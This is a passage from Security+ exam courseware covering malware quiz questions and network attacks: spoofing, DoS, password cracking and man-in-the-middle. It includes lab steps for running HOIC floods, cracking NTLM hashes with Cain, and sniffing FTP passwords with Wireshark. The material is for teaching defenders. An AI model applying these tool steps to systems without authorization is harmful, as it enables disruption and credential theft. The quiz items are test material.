Chapter 2: Understanding attacks / Module C: Malware

Assessment: Malware
1. A user complains that every time they open their Internet browser, it no longer goes to their preferred
home page and advertisements pop up in dialog boxes that they have to close. What is the likely cause?
Choose the best response.
 Spyware
 Trojan
 Virus
 Worm

2. A user logs into their computer and is presented with a screen showing a Department of Justice logo
indicating the computer has been locked due to the user being in violation of federal law. The screen gives
several details of the violation and indicates that the user must pay a fine of $500 within 72 hours or a
warrant will be issued for their arrest. The user cannot unlock their system. What type of malware is
likely infecting the computer? Choose the best response.
 Keylogger
 Ransomware
 Rootkit
 Trojan
 Worm

3. What kind of malware can spread through a network without any human interaction? Choose the best
response.
 Polymorphic virus
 Trojan horse
 Virus
 Worm

4. You've traced some odd network activity to malware that's infected a whole department's computers.
They're processing a distributed task using spare CPU cycles, communicating with a remote server, and
sending email to random targets. What kind of malware is it? Choose the best response.
 Botnet
 Rootkit
 Spyware
 Trojan

5. You've found a computer infected by stealth malware. The program installed itself as part of the
computer's boot process so that it can gain access to the entire operating system and hide from
antimalware software. What kind of malware is it? Choose the best response.
 Armored virus
 Backdoor
 Rootkit
 Spyware

CompTIA Security+ Exam SY0-501 71


Chapter 2: Understanding attacks / Module D: Network attacks

Module D: Network attacks


The network is the most important tool of modern attackers. It's by far the easiest way to distribute malware,
and it's even a great vector for social engineering attacks. Most popular application attacks are against web
applications that wouldn't even exist without today's networks. In addition to that, many attacks are directly
against the network itself: accessing hosts or resources, disrupting network functions, or stealing data in
transit. Since many core network protocols were designed before security was a real concern, networks are
still full of vulnerabilities and subject to many attacks.
You will learn:
 How to classify network attacks
 About probing, spoofing, and redirection techniques
 About denial-of-service attacks
 About forced access and password cracking
 About eavesdropping and man-in-the-middle attacks
 About wireless network attacks

Classifying network attacks


Since network attacks are so varied and encompass so many different threats, there are a lot of ways to
categorize them. One is by the part of the CIA triad it targets. Confidentiality-violating attacks are favored by
hackers seeking to access sensitive data; integrity is targeted by those seeking to alter information, and
availability by those seeking to impair others' use of the network. Sometimes an attack or series of attacks can
target multiple components of security, at once or in sequence. For example, many exploits involve simple
attacks on integrity or availability vulnerabilities as just one step toward breaking otherwise-strong
confidentiality measures.

Exam Objective: CompTIA SY0-501 1.2.2.14, 1.6.15


Another way to categorize attacks is by the layer of the network being targeted. Some attacks target the
physical hardware or connection technologies of the network, others the mid-level protocols of network
appliances, and still others go directly for vulnerabilities in applications or host operating systems. The latter
are frequently categorized as application attacks, but even then the role of the network in allowing, and
preventing, such attacks can't be ignored.
You can also classify attacks by the specific protocols and behaviors targeted. Some protocols are insecure by
nature, so are very vulnerable to attack. Others have security features, but with particular vulnerabilities an
attacker can exploit. Often different protocols that perform similar network tasks are still similar in how they
communicate across the network, making them vulnerable to similar attacks, such as eavesdropping.

Note: Remember, this list of attack types, like any other, is only a partial explanation of the security
threats facing any system or network. No matter how much you research, a system or application might
still have zero-day vulnerabilities: weaknesses that even programmers and security vendors don't know
about and haven't countered, and which attackers might learn about first. Zero-day attacks against these
vulnerabilities pose an extreme threat, just because they can catch otherwise strong defenses entirely
unprepared.

Probes
Every network has its own set of vulnerabilities, and an efficient, determined attacker wants to know as much
as possible about them before making any serious moves. That might sound terribly obvious, but there's still a
lot to that process. Vulnerabilities can depend on a host of different factors: not only do attacks target specific

72 CompTIA Security+ Exam SY0-501


Chapter 2: Understanding attacks / Module D: Network attacks

services or protocols, the specific implementation in the target network can make all the difference, especially
when it comes to more specific exploits. Operating system, application version, hardware vendor or model,
and user settings can all work together to define vulnerabilities, as can security measures, or malware
infections, in place on the network.

Exam Objective: CompTIA SY0-501 2.2.12


Most of these vulnerabilities aren't readily obvious from outside the network, or even necessarily for a casual
user on the inside. This means an attacker looking to get into a specific network will probably start with
probes—network communications that don't do any damage, but are designed to reveal the network's
structure and weaknesses. Sometimes this is pretty simple: just trying to connect to a given address with a
client application like a web browser or FTP client will not only tell you whether there's an accessible server
there, but might include other information like the vendor and version of the server application. Likewise,
eavesdropping on network traffic, even packets that don't contain sensitive information, can reveal protocol
versions and specific applications in use.

Another approach is a specialized program. One example is a port scanner, an application that sends packets
to a whole range of port numbers on a host, looking to find open ports with active services. The response will
tell the attacker what ports are listening, and potentially more about the specific service. Simple port scanners
use typical TCP or UDP packets like ordinary network communications, for example sending SYN packets or
attempting full TCP 3-way handshakes. More complex tools might use specialized or non-standard requests
that can return more information.
Some popular attacks that utilize probing include the following:

Xmas attack The data packets used by many protocols use flags, header options that give information
about the packet's purpose or request specific recipient behavior. A packet with all flags
set is called a Christmas tree packet, because it's "all lit up" with a combination of
options normal conversation never uses. The traditional Xmas attack uses a TCP packet
with Urgent, Push, and FIN flags set. A related method uses a null packet, with no flags
set. How a remote host responds to Xmas or null scans can reveal information about its
inner workings as well as just what ports it has open. Additionally, processing such
packets can take extra processing time, making them useful in denial-of-service attacks.
Fuzzing Similar to a Xmas attack, but inserts random or invalid data into more complex header
fields or application data inputs. In extreme cases fuzzing attacks can crash applications
or entire systems, or gain access permissions; more commonly they're a way to learn how
a service or application responds to non-standard input, enabling future attacks.
Banner grabbing Sending a routine packet to a network service, such as a connection request, and seeing
what information is returned. This might sound innocuous, but since many services
openly report their software and protocol version along with other information, an
attacker can use it to search for applications or operating systems with known exploits.

Even probes that do no direct damage are still attacks: a successful probe compromises the network by
revealing its vulnerabilities to the attacker. They're also by nature active attacks: while some probes are hard
to distinguish from benign network traffic, others are visible to alert administrators.

CompTIA Security+ Exam SY0-501 73


Chapter 2: Understanding attacks / Module D: Network attacks

Spoofing
Almost any sort of communication needs to specify not only its destination, but it's point of origin so that the
recipient knows what to expect and where to respond. Spoofing is a technique where an attacker falsifies
source information in order to facilitate an attack. Many protocols don't have any way to authenticate source
addresses, so spoofing can be pretty easy. There are several common types of spoofing.

Exam Objective: CompTIA SY0-501 1.2.2.19, 1.2.2.20

IP spoofing Alters the source IP address used to route packets on IP networks.


MAC spoofing Alters the source MAC address used to identify physical devices on local networks.
Email spoofing Alters the sender address in an email message. Frequently used in phishing or other
email attacks.
Caller ID spoofing Alters the caller identification reported in a voice telephone call. A common feature in
vishing attacks.

Sometimes spoofing is used for social engineering, for example in phishing and vishing attacks where seeing
an unfamiliar address would make the target suspicious. It's also very common for network security devices to
control traffic according to its origin, and spoofing can circumvent some of these measures.
 Wireless access points are commonly configured only to allow certain MAC addresses to connect.
MAC spoofing allows an attacker to bypass this measure—even if the WAP's replies are sent to the
spoofed address, the attacker can still read them.
 Routers and firewalls often allow or block traffic based on source IP address. An attacker can spoof the
source address to bypass these controls. A drawback of this method is that the attacker might not be
able to receive replies addressed to the forged IP, but for some attacks that isn't a problem.

Spoofing is less commonly an attack in itself than it is a tool to enable other attacks or make them more
effective. It can even be used to hide attacks from logging or monitoring: a suspicious traffic pattern from a
single source might look perfectly innocuous if it's spread out from a number of different senders. You'll find
that spoofing of one sort of another is as nearly as common in network attacks as impersonation is in social
engineering.

74 CompTIA Security+ Exam SY0-501


Chapter 2: Understanding attacks / Module D: Network attacks

Redirection
In contrast with but related to spoofing, redirection techniques divert traffic from a target sender to a location
of the attacker's choosing. Reasons for redirection include:
 Sending network traffic where an attacker can eavesdrop on it
 Forcing a target to connect to a malicious site containing malware
 Tricking a target into submitting information to a phony site
 Exposing the target to other network attacks

Exam Objective: CompTIA SY0-501 1.2.2.9, 1.2.2.11, 1.2.2.12


Redirection often begins with some sort of spoofing attack used to compromise a traffic-direction component
on the network, but it can also rely on malware or other methods. Some common attacks focused on
redirection include the following:

ARP Network switches and hosts use Address Resolution Protocol (ARP) to resolve logical IP
poisoning addresses into physical MAC addresses, and store the resulting values in an ARP cache. When
attackers use spoofed ARP messages to alter that cache, they can redirect traffic addressed to a
given IP to any physical device they like. An attacker can use ARP poisoning to silently
eavesdrop, actively modify data in transit, or even just block network traffic entirely. Since
ARP only works on local network segments, ARP poisoning can generally only be performed
by inside attackers.
DNS Similar to ARP, hosts use the Domain Name Service (DNS) protocol to resolve human-
poisoning readable domain names into numeric IP addresses, and store the results in a cache. DNS uses
central DNS servers which hosts can contact. By compromising or impersonating these
servers, attackers can redirect network requests wherever they like, or block them entirely. For
instance, a poisoned DNS cache might redirect requests for popular search engines to
advertising or malware sites.
Hosts file Nearly every networked computer has a hosts file which also maps computer names into IP
alteration addresses. Most operating systems check the hosts file before the DNS cache, allowing it to
override DNS queries. This can be a legitimate tool and even enhance security, but if an
attacker alters the hosts file the result is much the same as DNS poisoning. Malware frequently
alters the hosts file on infected systems, redirecting search requests or blocking access to
security and antimalware sites.
Pharming Named as a combination between "farming" and "phishing," pharming is a popular practical
application of DNS poisoning. By compromising DNS lookups, an attacker redirects traffic for
a legitimate website to a malicious imitator. Much like in a phishing attack, victims might be
tricked into entering credentials or other sensitive data, or into downloading malware. Large-
scale pharming attacks are possible, but difficult and largely theoretical. Hosts files and DNS
servers built into consumer-grade routers are much more vulnerable.
Domain Domain names for publicly accessible sites must be registered with a domain registry. By
hijacking quickly re-registering an expired domain or compromising the account that controls it, an
attacker can redirect traffic intended for the original site to an imitator. The end result is very
much like pharming, but doesn't require DNS poisoning since it changes the "legitimate"
address of the site.
VLAN Switches often use virtual LANs (VLANs) to segment traffic both for performance and
hopping security reasons. Hosts on different VLANs can't communicate directly, even when they're
connected to the same switch. Compromising the protocols used to define and control VLANs
lets an attacker divert traffic to the wrong VLAN, exposing it to attack.

CompTIA Security+ Exam SY0-501 75


Chapter 2: Understanding attacks / Module D: Network attacks

Exercise: Probing a site


In this exercise, you'll perform simple probes on a website.
This exercise relies on online content for both Firefox and Maltego, and you will need to be prepared for both.
To complete the Firefox portion of the exercise, you need Firefox 57 or later, either on the Windows 7 VM or
on your host computer. If you are using an older version of the Windows 7 VM you may need to update
Firefox.
To complete the Maltego exercise you will need to log into the application using an online account. The
exercise gives instructions for registering a new account using a student email address, but alternatively the
instructor can create accounts for students before class.
Do This How & Why

1. In the Windows 7 VM or on your host This add-on gathers site information using your browser from
computer, install the HackSearch Pro public resources such as Google, DNS, and WHOIS databases.
add-on for Firefox.

a) Start Firefox.

b) Click the menu button, then Add- The Add-ons Manager opens in a new tab.
ons.

c) Search for the HackSearch Pro add- If the add-on isn't compatible with your Firefox version,
on, then click Add to Firefox. update Firefox and try again.

d) If prompted, restart Firefox to


apply the add-on.

2. Use HackSearch Pro. Note: Never probe sites without permission.

a) Navigate to a website. Choose your own company site, or one you have permission to
examine.

76 CompTIA Security+ Exam SY0-501


Chapter 2: Understanding attacks / Module D: Network attacks

Do This How & Why

b) Once the site loads, right-click on A PassiveRecon option appears in the context menu.
the page.

c) Examine the available options. You can search for internal links within the site, for referenced
subdomains, specific document types, usernames and
passwords, email addresses, and so on. You can also search for
DNS and WHOIS info on the site you're visiting.

d) Click HackSearch Pro > Within The add-on automatically performs a Google search for
Site Search. indexed pages within the website. The list might include pages
you can't easily navigate to from the front page of the site.

e) Click HackSearch Pro > DNS The add-on displays a Robtex search showing details about the
Info. site's DNS entries, including information about location or
email servers. Since it's public information you don't need to
access the site itself to view it.

f) If time allows, view other


HackSearch Pro results.

g) Close all open windows. Next you'll use another reconnaissance tool.

3. Start the Kali Linux VM. You can close the Windows 7 VM if you need to conserve
memory.

4. Log in with username root and


password toor.

5. Install Maltego. Maltego is a penetration testing tool, much more in depth than
PassiveRecon.

CompTIA Security+ Exam SY0-501 77


Chapter 2: Understanding attacks / Module D: Network attacks

Do This How & Why

a) Click Applications > 01 -


Information Gathering >
Maltegoce on the dashboard.

b) Follow the onscreen instructions to You'll need to register using an email account to log in.
set up the client.

c) Accept all defaults, then click The Start a Machine window opens.
Finish.

6. Perform a scan using Maltego.

a) In the Start a Machine window,


click Footprint L1, then Next.

b) Enter a domain name you have Accept any disclaimers that appear. Results might take a few
permission to scan, then click minutes.
Finish.

c) Examine the results. An attacker could learn about the site's network configuration
using this tool. Even if it probably won't show anything too
sensitive, it might reveal vulnerabilities or avenues of attack.

7. Close all windows.

78 CompTIA Security+ Exam SY0-501


Chapter 2: Understanding attacks / Module D: Network attacks

Denial-of-service attacks
Attacks on accessibility are commonly called denial-of-service (DoS) attacks, because their main effect is the
denial of network services to legitimate users. Depending on the method, a DoS attack's consequences can be
temporary slowdowns, crashing of network devices or applications, or even hardware damage. Sometimes
denying service itself is the attacker's goal, either for inconvenience and disruption or as a means of extortion
against the system owner; other times, DoS is just a way to destabilize a system and leave it vulnerable to
further exploits. DoS attacks can be lengthy affairs, lasting days or weeks at a time, and even when they don't
outright crash systems the performance hit can be very disruptive to the target's regular functions.

Exam Objective: CompTIA SY0-501 1.2.2.1, 1.2.2.2, 1.2.2.10


DoS is an attack goal more so than a technique, and there are many ways to do it. The most basic is brute
force: all the attacker needs is the network resources to flood the target system with enough data or requests
that it can't respond to all of them, and the system slows to a crawl or even crashes due to resource
exhaustion. A simple method is a ping flood, sending enough ICMP ping requests that the host can't respond
to them all, and its network bandwidth or even other system resources are too strained to handle other traffic.
The same principle holds true for many other types of network requests.
The problem with a simple DoS (that is, if you're the attacker) is that it takes a lot of network resources to
implement, and it's not very hard for an alert network administrator to counter a basic DoS attack by blocking
traffic from the offending site. To generate more potent threats, attackers use amplification to make stronger
DoS attacks.
One amplification method is a distributed denial-of-service (DDoS) attack, using multiple attacking systems
in multiple locations to generate a traffic spike that will challenge even powerful targets. It's also harder to
block since it comes from many different networks. A DDoS can be a coordinated attack planned by many
malicious users; this is a common method used by hacktivists or other organized attackers. More insidiously,
DDoS attackers aren't always even willing: such attacks commonly use botnets.

CompTIA Security+ Exam SY0-501 79


Chapter 2: Understanding attacks / Module D: Network attacks

A related way to amplify the power of DoS or DDoS is by using a reflected attack: these rely on IP spoofing
to generate traffic from unrelated hosts, generally of the sort that would be harmless other than its sheer
volume. An early example was the smurf attack which was popular in the late 1990s. It's like a ping flood, but
instead of pinging the target directly, the attacker pings a large number of other systems. The trick is that
those packets all have the target's IP address forged as their source, so when the other systems think they're
replying to the originating host's IP, they're actually flooding the victim with a DDoS attack.
Network administrators responded to frequent smurf attacks by configuring many servers and routers not to
respond to or forward external ping packets, so they're not nearly as popular or effective as they used to be.
Since then, new reflected attacks have surfaced, targeting more critical services like DNS or NTP. These can
be potent attack amplifiers, and difficult to block without restricting important network functions.

80 CompTIA Security+ Exam SY0-501


Chapter 2: Understanding attacks / Module D: Network attacks

DoS variants
Traditional DDoS and reflected attacks bombard targets with large amounts of fairly normal traffic. Other
DoS attacks rely on misusing protocols by sending abnormal traffic or malformed packets that confuse the
target; they either require extra system resources to process, exploit weaknesses to crash services, or even
allow malicious code to run. In some cases a single packet, like the so-called ping of death, can bring down an
entire vulnerable system. There are several avenues to this kind of protocol abuse, often used in conjunction,
and many of them are also classified as application attacks.
 Oversized packets, especially for control or message protocols that don't normally carry much data, can
confuse a host and cause undesired behavior. If the receiving application only has limited memory, or
buffer space to receive that data, a buffer overflow can cause it to crash. Worse, it could run the
overflowing data as executable code, compromising the system as a whole.
 Malformed packets containing garbage data can also cause damage, whether they're oversized or not. A
properly written host application will detect errors and discard bad data, but a vulnerable one might
crash or behave unpredictably.
 Even properly formed packets can harm a host by deliberately misusing a protocol. A SYN flood attack
abuses the TCP connection by sending a constant stream of SYN packets used to open connections, but
never responding to the returning acknowledgments from the server. The resulting half-open
connections consume system resources, eventually preventing legitimate users from connecting.

DoS attacks can also be physical, potentially rendering network devices unusable without repair: this is also
called a permanent DoS. The most obvious physical attack is someone with physical access to network
hardware damaging or destroying it. Sophisticated remote attacks can also overwrite device firmware, leaving
it bricked, or unable to boot. Other complex attacks are possible: someone who gets access to electrical or
climate control systems could cause surges or overheating that will crash or physically damage servers and
other network hardware. Less severely, someone could introduce signal interference to deliberately jam a
wireless or even wired connection.
Finally, not all DoS events are technically attacks. Unintentional, or friendly, DoS occurs when a system gets
a sudden surge of legitimate traffic it isn't prepared for, and experiences slowdowns or crashes as a result. A
common term in the late 1990s and early 2000s was slashdotting, named for the tech news site Slashdot.
There was nothing shady or malicious about Slashdot itself: it's just that the site was so popular that when it
published an article about another website, the other site would find itself flooded by curious users who read
about it on Slashdot. Sites not prepared for that level of traffic would frequently become unreachable to new
or regular users alike. The same thing happens with today's even larger social media sites: getting noticed by a
suddenly wider audience can overcome servers not used to heavy traffic, and harm immediate business
operations as surely as a DoS attack would.

CompTIA Security+ Exam SY0-501 81


Chapter 2: Understanding attacks / Module D: Network attacks

Exercise: Simulating a DoS attack


You'll need to have Windows 7 and Windows Server 2012 running simultaneously for this exercise. In this
exercise, you'll simulate a DDoS attack against a fictitious website using High Orbit Ion Cannon. It's a simple
utility that can be used both for network stress testing or for actual DoS attacks.

Do This How & Why

1. In Windows 7, double-click hoic 2.1. It's in the Tools folder on the desktop. High Orbit Ion Cannon
opens.

2. Add a new target.

a) In HOIC, click +. The Target window opens.

b) In the URL field type This isn't a real site, but for purposes of the exercise it doesn't
http://www.dostest.com. need to be.

c) Move the Power slider to High.

d) Click Add. The site appears in the target list.

3. In Windows 2012, monitor network You'll watch what happens when the attack is running.
activity.

a) Open Task Manager. You may need to click More Details to see the full interface.

82 CompTIA Security+ Exam SY0-501


Chapter 2: Understanding attacks / Module D: Network attacks

Do This How & Why

b) On the Performance tab, click There shouldn't be much, if any, activity right now.
Ethernet.

4. Start a DoS attack.

a) In HOIC, click FIRE TEH


LAZER!

b) In Windows 2012, view network The activity should increase. It still may not appear as much
activity. on a fast connection.

c) In Windows 7, click FIRE TEH To stop the attack.


LAZER! again.

d) Increase Threads to 10.

e) Start the attack again. The network activity is higher this time.

5. Stop the attack and close all open A single instance of this application doesn't generate very
windows. much traffic, but some real attacks have involved thousands of
users.

Forced access attacks


The first thing most people think of when they hear about information security, or hacking, is the risk of an
attacker gaining access to a sensitive system to take control or get at its information. That's no misconception:
gaining the right sort of system access allows an attacker to freely compromise any part of the CIA triad, so
many attacks are based around gaining access or escalating privileges. Remember that to an attacker just
getting a foot in the door is valuable, since access to one weakly protected system lets you pivot to attack the
whole network through its internal trust relationships.
The easiest way for an attacker to bypass access controls is by choosing a target that doesn't have any. PCs
often don't even have passwords configured, or users simply leave themselves logged in whether they're at the
keyboard or not. Even when hosts are secured, network access turns an attacker from an outside threat to a
more dangerous inside one. Many careless users and administrators create Wi-Fi hotspots with no password
for the sake of convenience, and it's even more common for a wired network to be accessible to anyone who
can plug in. Even some network services and shared resources either don't use authentication, or can be
configured not to require authentication: this can allow even a remote attacker to access resources.
Assuming a system uses a password or other authentication mechanism, an attacker's most obvious option is
to get a hold of it and access the system using legitimate credentials. Obviously, this depends on the attacker
getting a hold of the credentials in the first place. For this reason, stealing passwords alone is one of the most
common goals of hackers and social engineers alike: it literally unlocks the path to anything else they might
want.

CompTIA Security+ Exam SY0-501 83


Chapter 2: Understanding attacks / Module D: Network attacks

Finally, even if a strong authentication mechanism is in place, an attacker might be able to bypass it.
Backdoors and other exploits can allow system access without the normal authentication process. One
example of such an exploit is the transitive trust used by some trust models. Transitive trust means that if
Alice trusts Bob to access her system, and Bob trusts Dave, it's assumed that Alice also trusts Dave. If Chuck
comes by and wants to steal Alice's data, he doesn't need her password or even her trust: he can hack or
befriend Bob or Dave, and gain access to her system that way.

Password cracking
Attackers who can't steal passwords can just try to guess one, a process called password cracking. This can be
surprisingly easy. Even outside of those who pick 12345 or football, many users will use the same
password on literally every system, site, or service they use, so learning one learns them all. Network devices
and services often come installed with a default password, which administrators may not bother to change.
While some systems, especially online ones, will lock out users or alert administrators after a number of
failed attempts, others only apply time delays that will slow but not stop a determined attacker. Some even let
attackers keep going until they find a solution, and especially when crackers steal password-protected drives
or databases nothing keeps them from trying password after password offline until they find the one that
works. Cracking isn't just for user passwords: it can also be used on any sort of encrypted data that can be
unlocked by the proper key.

Exam Objective: CompTIA SY0-501 1.2.2.16, 1.2.4.1, 1.2.4.2, 1.2.4.3, 1.2.4.4, 1.2.4.5, 1.2.4.6
Automated tools are commonly used to speed the cracking process. Their methods aren't unlike manual ones,
just faster and more tireless.

Brute force The cracker tries every possible password in a methodical order until the right one is
found, such as A to Z. Eventually brute force techniques can guess any password, but it's
very slow and easily defeated by long passwords or lockout controls.
Dictionary attack The cracker uses word lists, such as literal dictionaries or lists of common passwords
downloaded from the internet. These won't easily guess random character strings, but are
very effective against passwords comprised of words or names, like many users choose
for ease of remembering. Passwords requiring combinations of letters, numbers, and
symbols are less vulnerable to dictionary attacks even if they use familiar words.
Hybrid attack An improved dictionary attack, which not only tries dictionary entries, but also common
variants such as added numbers or character substitution. For example, where a
dictionary attack might try password (distressingly, the second most common leaked
password of 2015), a hybrid attack might also try variants like password1, !
password, and p@ssw0rd

Even when attackers can steal password data outright from something like a user database file or a network
authentication packet, they still might need to crack it. This is because for security reasons passwords are
frequently stored or transmitted only in the form of a cryptographic hash created from the actual password.
Implemented properly, hashes can be used for authentication without exposing the password itself to spies or
hackers, but since hash functions are imperfect they can also be cracked, or used to crack passwords.

84 CompTIA Security+ Exam SY0-501


Chapter 2: Understanding attacks / Module D: Network attacks

Birthday attack Hashing functions are vulnerable to hash collisions, where two different inputs create the
same hash. When hashes are used to transmit or verify passwords, this means the hacker
doesn't need to know the actual password—any password that generates the same hash
will do. For weaker hashing algorithms, this can greatly increase cracking speed for
passwords and anywhere else cryptographic hashing is used.
Note: Birthday attacks are named for the birthday problem in probability
theory, a seeming mathematical paradox. Despite there being 365 days in
the year, if you gather 25 random people in a room there's a 50% chance
that two of them will share the same birthday. The underlying
mathematics are beyond the scope of this topic, but they're very similar to
those used in the attack.
Rainbow table Pre-computed tables containing a large number of hash values, which can be used to
quickly find the password behind a particular hash. Rainbow tables are an effective way
to quickly attack a large number of different passwords, but they are an example of a
time-memory tradeoff: a complete hash table even for fairly short passwords might be
many gigabytes in size. Rainbow tables are typically created using more complex
algorithms that reduce the table size but make cracking take longer than a simple hash
table.
Pass the hash Even if attackers can't directly crack stolen hashes to retrieve passwords, they might not
need to. In single sign-on systems using NTLM or Kerberos for authentication it's
sometimes possible for an attacker to just compromise one system and steal its stolen
hashes. The attacker can then present the stolen hash to access resources on another
computer on the network, using the stolen credentials.

Password attacks of any sort are potent only if passwords are weak or improperly stored and transmitted.
Strong password policies can make cracking attempts impractical, and even stored password hashes can use
salting or key stretching techniques that render rainbow tables ineffective. By contrast, weak cryptographic
implementations can make even a long password or encryption key easy to crack.

Exercise: Cracking passwords


In this exercise, you'll use a password-cracking application to find your current Windows password.
Do This How & Why

1. In Windows 7, double-click the Cain Click OK when you see the firewall warning.
icon on the desktop.

2. Extract the NTLM hashes from the Windows stores passwords as hashes in the local system.
local system. They're not meant to be extracted, but can be cracked by brute
force.

a) On the Cracker tab, click LM &


NTLM Hashes.

CompTIA Security+ Exam SY0-501 85


Chapter 2: Understanding attacks / Module D: Network attacks

Do This How & Why

The Add NT Hashes from window appears. You'll keep the


b) Click the right pane, then click defaults.
.

c) Click Next. The Windows local password hashes are extracted into Cain,
but you still need to crack them.

3. Crack the Administrator password. You'll use a brute force cracking technique, since it's not a
dictionary password.

a) Right-click Administrator and The Brute-Force Attack window opens.


click Brute-Force Attack >
NTLM Hashes.

b) Click Custom. You know that the password is P@assw0rd, so you'll make
sure the right characters are in there.

c) In the Custom field, type "Password" and the characters which are most similar to it.
pP2@sS$wWoO0rRdD.

d) If time is limited, in the Start From You'll have it start on the right one to save time.
field, type P@ssw0rd.

e) Click Start. Sooner or later, the password is discovered.

4. Close all open windows.

86 CompTIA Security+ Exam SY0-501


Chapter 2: Understanding attacks / Module D: Network attacks

Eavesdropping
Especially on networks, sensitive information isn't just what's sitting in files on servers: it's also what's being
actively sent around the network. Attackers after this sort of information don't need to log in as long as they
can just passively listen to network traffic and intercept what they want with little risk of detection. Even
worse, they might be able to intercept login credentials to get in at a later time, or secretly modify information
in transit to attack integrity as well as confidentiality.

Exam Objective: CompTIA SY0-501 1.2.4.9, 2.3.1


Any kind of eavesdropping requires the attacker to access a node or link carrying traffic: this could be
plugging into an interface, physically tapping a cable, or just getting in range of wireless transmissions or the
RF emanations of a wired connection . A NIC set to promiscuous mode (with or without its owner's
knowledge) can be used for packet sniffing, or recording network traffic that's addressed to other hosts.
Switches often have port mirroring functions that send traffic to network monitoring systems for diagnostic
purposes, but that provides access for an attacker too.
On the LAN, network segmentation helps to limit the traffic a given eavesdropper can hear. This can be seen
as a security feature, but it's not entirely reliable since it's easily circumvented by many attacks. VLAN
hopping and ARP poisoning are just two methods inside attackers can use to overcome segmentation.
Sometimes accessing packets is all an attacker has to do to compromise a network, just because a lot of
network traffic is unprotected plaintext. Many popular protocols for connectivity, management, and network
applications transmit "in the clear," even when sessions themselves require passwords. Such insecure
protocols include HTTP, FTP, Telnet, POP, IMAP, SLIP, and SNMPv1 and v2. Worse, the passwords
themselves can be plaintext, so an eavesdropper just has to watch a connection being made to steal login
credentials for later.
Secure protocols using encrypted data are safer from eavesdroppers, but that doesn't mean they're fully
protected: some encryption methods are weak or exploitable. One simple example is the known plaintext
attack. If an encryption algorithm is weak, and if the attacker knows what part of the plaintext message is
(such as frequently used sequences of data), it's possible to deduce the key from just that part of the encrypted
ciphertext and unlock the entire message.
Even information that isn't secret, or is safely encrypted can still be useful for an eavesdropper that's gathering
host or user information, or planning certain types of later attacks.

Man-in-the-middle attacks
A more complicated but potent form of eavesdropping is the man-in-the-middle attack, where an attacker
intercepts and relays traffic between hosts, impersonating each host in the eyes of the other. Each end of the
conversation thinks it's communicating directly, but in truth the whole conversation is under the attacker's
control.

Exam Objective: CompTIA SY0-501 1.2.2.3, 1.2.2.13, 1.2.2.15, 1.2.2.17.2, 1.2.4.7, 1.2.4.8

CompTIA Security+ Exam SY0-501 87


Chapter 2: Understanding attacks / Module D: Network attacks

MitM attacks can be initiated a lot of ways, such as ARP cache poisoning. In this example, Alice wants to
connect to Bob's server. She tries to log in, but the attacker, Mallory, had used spoofed ARP packets to
convince Alice's NIC that her MAC address is actually Bob's. As a result, the packets go to Mallory instead.
Mallory doesn't just capture them: she relays them right along to Bob in Alice's name, so the login can
outwardly continue as normal. The same thing happens in reverse: when Bob thinks he's answering Alice, he's
actually replying to Mallory in disguise. A whole session can continue that way; at the end Mallory has all the
information exchanged, but Alice and Bob don't know anyone else was listening.
Other variants of MitM rely on gathering information via packet sniffing, and then using it to take over
communications or gain independent access.

Replay attack The attacker intercepts data transmissions, especially those with authentication
credentials or encryption key exchanges, then delays or resends them. This allows the
attacker to disrupt legitimate communications, gain unauthorized access, or both. Replay
attacks can be thwarted by timestamps and number sequences, which will not be updated
in the replayed communications.
Session replay In TCP/IP networks, TCP establishes ongoing communication sessions between two
hosts but relies on application layer protocols to handle security. Some of these are
susceptible to replay attacks. HTTP, used by websites and web applications, is one
example of a stateless protocol, meaning that web servers don't inherently know if a
request is coming from a new client or an existing one. To solve this, sites requiring
authentication need session identifiers such as cookies or special URL data to associate
an incoming request with an existing session. Poorly configured servers or careless users
allow an attacker to replay the session identifier later; from the server's perspective, it's
just continued communication with the same user.
Session hijacking Similar to session replay, except the attacker takes over the session immediately after the
client logs in. Session hijacking can be more visible since the legitimate client might
notice what happened, but it can overcome some anti-replay measures.
Downgrade Many secure protocols use strong encryption by default, but allow weaker encryption for
backward compatibility with hosts that don't support the newest standards. Some might
even fall back to plaintext communications. In a downgrade attack, the attacker interferes
with the initial connection setup to trick legitimate clients into using weak or no
encryption. This doesn't in itself take control of the connection, but it weakens security
enough to make other attacks possible.
Man-in-the- An attack where a trojan or other spyware infects a web browser, then either modifies the
browser pages the user views, or the actions the user takes. This can bypass strong network
encryption by functioning within the browser itself, and it can be initiated whenever the
user navigates to a desired site.

88 CompTIA Security+ Exam SY0-501


Chapter 2: Understanding attacks / Module D: Network attacks

The whole process might sound more complicated and risky than just eavesdropping, and it is, but it
overcomes a lot of the weaknesses of passive listening. MitM attacks can eavesdrop on strongly encrypted
conversations by separately negotiating encryption with each host; that way, when the packets pass through
the attacker's system they'll be decrypted into plaintext and easy to read. Additionally, since the MitM relays
information rather than passively listening, an attacker can freely modify it. If Alice were connecting to her
bank, Mallory could change transaction amounts and destinations, sending money to her own account. She
can even send false confirmation information back, so Alice sees only the transaction she entered.

Exercise: Simulating an eavesdropping attack


A lot of popular network protocols are easy for eavesdroppers to scan for valuable information.
Do This How & Why

1. On your Windows 7 desktop, double- Wireshark is a network analyzer application that can capture
click Wireshark. network traffic. It will take a few moments to open and load all
modules.

2. Start capturing network traffic. In this case you'll only be scanning traffic over this system's
network interface, but anyone on your local network segment
could view the same data.

a) In the Wireshark window, click


Local Area Connection.

b) In Wireshark's main toolbar, click Wireshark begins displaying all network traffic. Any packets
. that go through your network interface will appear in the upper
pane.

3. Create an FTP connection.

a) Open a command window. Type cmd into the Search box.

b) Type ftp 10.10.10.2 You're prompted for a user name and password.

c) Enter user as your user name, and You're logged into the FTP server.
T3mpUser as your password.

4. Review the logged FTP traffic.

a) In Wireshark, click . Wireshark stops capturing, but what you already captured is
still on display.

CompTIA Security+ Exam SY0-501 89


Chapter 2: Understanding attacks / Module D: Network attacks

Do This How & Why

b) In the filter bar, type ftp and press Enter.

The logged traffic is filtered to only show the FTP conversation. It shows the content of the
conversation too, but you'll read it a little more clearly.

c) Right-click any packet and click


Follow > TCP Stream.

Since FTP is a plaintext protocol, not only are commands


clearly readable, so is the user name and password.

5. Who else might have been able to In theory, anyone on any network segment between you and
learn your password? the FTP server could have viewed the conversation, including
the password. On a trusted network this isn't so bad, but over a
public network or the internet it could be a serious risk.

6. Close all open windows.

90 CompTIA Security+ Exam SY0-501


Chapter 2: Understanding attacks / Module D: Network attacks

Wireless attacks
The features that have made wireless networks so popular also introduce new vulnerabilities. So do the
specific implementations used by many common standards. Therefore, it's no surprise a number of new
attacks have become popular. For the most part, they operate on the same principles as wired network attacks,
it's just that the physical nature of a wireless network makes certain attacks much easier.

